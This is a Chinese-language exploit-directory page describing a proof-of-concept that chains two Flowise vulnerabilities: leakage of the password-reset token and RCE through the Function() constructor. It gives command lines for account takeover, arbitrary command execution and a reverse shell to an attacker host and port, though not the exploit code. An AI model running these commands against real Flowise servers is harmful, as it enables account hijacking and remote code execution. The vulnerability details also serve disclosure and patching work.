Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-58434-59528 — CVE-2025-58434和CVE-2025-59528链式POC | Kitploit
工具/GitHubGitHub/azureadtrent/cve-2025-58434-59528
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证远程访问工具
GitHubazureadtrent/cve-2025-58434-59528

CVE-2025-58434-59528

CVE-2025-58434和CVE-2025-59528链式POC

查看仓库
435个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-58434 + CVE-2025-59528

影响 Flowise <= 3.0.5 的两个漏洞的利用链。


漏洞

CVE-2025-58434 — 未认证账户接管

忘记密码接口会在 API 响应中返回有效的密码重置令牌,且无需认证。只要知道有效电子邮件地址的攻击者即可在无用户交互的情况下重置任意账户的密码。

CVE-2025-59528 — 认证后远程代码执行

CustomMCP 节点将用户控制的输入直接传递给 Function() 构造函数,并拥有完整的 Node.js 权限。拥有有效 API 密钥的认证用户可以以 Flowise 进程用户的身份执行任意操作系统命令。

修复版本: Flowise 3.0.6


要求

  • Python 3.8+
  • pip install requests

用法

完整 ATO 链(重置密码、提示输入 API 密钥、触发反弹 Shell):

root@kitploit:~
python3 flowise_chain.py -t http://target -e [email protected]

仅 RCE(如果你已有 API 密钥):

root@kitploit:~
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"

使用现有密钥的反弹 Shell:

root@kitploit:~
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444

选项

标志描述
-t, --target目标 URL
-e, --email目标账户邮箱(触发 ATO 链)
--api-key直接提供 API 密钥(跳过 ATO)
-c, --command要执行的命令
--lhost攻击者 IP(反弹 Shell)
--lport攻击者端口(反弹 Shell,默认:4444)
--new-password重置时设置的新密码(默认:Pwn3d!2026)
-k, --insecure跳过 TLS 验证

备注

由于 Flowise 3.0.5 的一个特性,重置密码 API 端点不会立即更新登录端点所接受的凭据。脚本在重置后会暂停,并提示你手动登录 UI 并从 /apikey 复制 API 密钥。

下载工具